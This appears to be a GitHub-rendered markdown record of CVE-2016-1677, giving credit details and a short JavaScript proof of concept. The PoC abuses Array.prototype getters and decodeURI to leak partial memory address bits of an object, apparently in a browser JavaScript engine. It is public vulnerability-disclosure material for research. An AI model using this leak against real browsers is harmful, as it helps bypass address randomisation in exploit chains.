Skip to content

Latest commit

 

History

History
23 lines (18 loc) · 502 Bytes

CVE-2016-1677.md

File metadata and controls

23 lines (18 loc) · 502 Bytes
Raw

CVE-2016-1677

  • Date: May 2016
  • Credit: Guang Gong of Qihoo 360

PoC

var num = new Number(10);
Array.prototype.__defineGetter__(0,function(){
        return num;
})
Array.prototype.__defineSetter__(0,function(value){
})
var str=decodeURI("%E7%9A%84");
//in 32bit system, the leaked bits is [31..16]
////in 64bit system, the leaked bits is [47..32]
//alert("partial address of object num is "+str.charCodeAt(0).toString(16));

Reference